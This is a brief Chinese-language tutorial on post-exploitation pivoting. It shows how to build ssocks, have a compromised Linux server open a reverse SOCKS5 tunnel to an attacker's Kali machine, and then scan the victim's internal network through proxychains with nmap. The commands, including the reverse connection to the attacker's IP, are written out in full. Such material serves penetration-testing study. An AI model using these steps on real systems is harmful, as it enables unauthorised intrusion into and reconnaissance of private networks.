Socket的下载安装
下载地址:http://sourceforge.net/projects/ssocks/
受害者Linux服务器与攻击者的kali机器都需要下载socket文件(因为都不自带)
下载之后,cd进入socket目录,使用下面命令进行编译并生成一个文件:
./configure && make
反向连接
攻击机器kali开启监听
Cd到socket下src目录
./rcsocks -l 1088 -p 1080 -vv
//等待远程Socks5服务器访问本地1080端口,并将数据转达到本地端口1088
//最后的 “ -vv ”是显示过程信息。
受害机器进行会话反弹
./rssocks -vv -s 192.168.0.115:1080
//192.168.0.115是攻击者的IP
利用proxychains进行Socks5代理
Ubuntu中安装proxychains的命令(kali自带不用装):
apt-get install proxychains
在kali里面修改” vim /etc/proxychains.conf “
注释掉socks4 127.0.0.1 9050
在最下方增加socks5 127.0.0.1 1088
代理火狐浏览器,来访问目标内网中10.10.10.128的机器
Proxychains firefox http://10.10.10.128
用kali 里面的nmap扫描 10.10.10.128
proxychains nmap –Pn -sT 10.10.10.128
//socks可以代理tcp流量,但是不能代理ping,因为ping使用的是icmp协议。
//-Pn 是非ping扫描,-sT是3次握手方式tcp的扫描
扫描整个内网
proxychains nmap –Pn -sT 10.10.10.0/24
扫描整个内网中的80端口
proxychains nmap –Pn -sT 10.10.10.0/24 -p 80
其他
Socks有socks 4 和socks 5两种类型,socks 4只支持TCP协议而socks 5支持TCP/UDP协议,
还支持各种身份验证机制 等协议。其标准端口为1080。
补充:Socks支持ftp与http协议